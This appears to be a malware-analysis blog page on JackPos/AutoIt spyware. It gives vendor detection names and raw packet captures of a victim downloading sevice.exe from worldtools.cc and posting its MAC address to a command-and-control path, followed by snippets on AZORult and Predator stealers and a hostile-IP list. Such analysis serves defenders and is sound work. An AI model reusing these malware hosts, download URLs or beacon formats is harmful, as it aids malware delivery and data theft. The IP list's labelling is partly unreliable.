| SHA256: | ac6d8abf4143abbeba5b973b684141ff8abe947f2a63384d3252c2b8b0700750 |
| File name: | sevice.exe |
| Detection ratio: | 43 / 56 |
| Kaspersky | Trojan.Win32.Autoit.fgg | 20170116 |
| Malwarebytes | Spyware.JackPos | 20170116 |
| McAfee | Artemis!40C9604050E2 | 20170108 |
| McAfee-GW-Edition | BehavesLike.Win32.Generic.tc | 20170116 |
| eScan | Trojan.GenericKD.4147639 | 20170116 |
| Microsoft | Trojan:Win32/Dynamer!ac | 20170116 |
| NANO-Antivirus | Trojan.Win32.Autoit.ekgraq | 20170116 |
| Panda | Trj/CI.A | 20170115 |
| Qihoo-360 | Win32/Trojan.d80 | 20170116 |
| Rising | Trojan.Injector!8.C4-BSQtmSMkVWS (cloud) | 20170116 |
| Sophos | Troj/Autoit-BVM | 20170116 |
| Symantec | Trojan.Gen | 20170115 |
| Tencent | Win32.Trojan.Autoit.Pciz | 20170116 |
| TrendMicro | TROJ_OTOTI.GQA | 20170116 |
| TrendMicro-HouseCall | TROJ_OTOTI.GQA | 20170116 |
| VIPRE | Trojan.Win32.Generic!BT | 20170116 |
| ViRobot | Trojan.Win32.S.Autoit.1534464[h] |
2017-01-16 00:05:06.003162 IP 192.168.1.102.63152 > 193.109.68.128.80: Flags [P.], seq 0:291, ack 1, win 256, length 291: HTTP: GET /exec/sevice.exe HTTP/1.1
E..KI#@……..f.mD….P.eh.G../P…&…GET /exec/sevice.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: worldtools.cc
Connection: Keep-Alive
2017-01-16 00:05:39.211577 IP 192.168.1.102.61331 > 75.75.75.75.53: 21636+ A? worldtools.cc. (31)
E..;…….[…fKKKK…5.’..T………..
worldtools.cc…..
2017-01-16 00:05:39.344430 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [S], seq 1759156153, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4K.@….F…f.mD….Ph……… ..~…………..
2017-01-16 00:05:39.469489 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 1051522394, win 256, length 0
E..(K.@….Q…f.mD….Ph…>..ZP….:……..
2017-01-16 00:05:39.470028 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [P.], seq 0:48, ack 1, win 256, length 48: HTTP: GET /post/echo HTTP/1.1
E..XK.@…. …f.mD….Ph…>..ZP…X…GET /post/echo HTTP/1.1
Host: worldtools.cc
2017-01-16 00:05:39.640279 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [P.], seq 48:238, ack 223, win 255, length 190: HTTP: POST /post HTTP/1.1
E…K.@……..f.mD….Ph…>..8P…U…POST /post HTTP/1.1
User-Agent: something
Content-Type: application/x-www-form-urlencoded
Host: worldtools.cc
Content-Length: 29
Cache-Control: no-cache
mac=00-0C-29-18-4A-91&t1=&t2=
2017-01-16 00:05:40.392086 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 443, win 254, length 0
E..(K.@….N…f.mD….Ph…>…P………….
2017-01-16 00:05:45.339491 IP 192.168.1.102.63153 > 193.109.68.128.80: Flags [.], ack 444, win 254, length 0
E..(K.@….M…f.mD….Ph…>…P………….
Written By
2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E....=@...wX . ...u-.N.P'&"i....P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozill...
AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info...
Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallet...
Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification:DownloaderSpyware Threat Names:AZORult v3Gen:Varian...
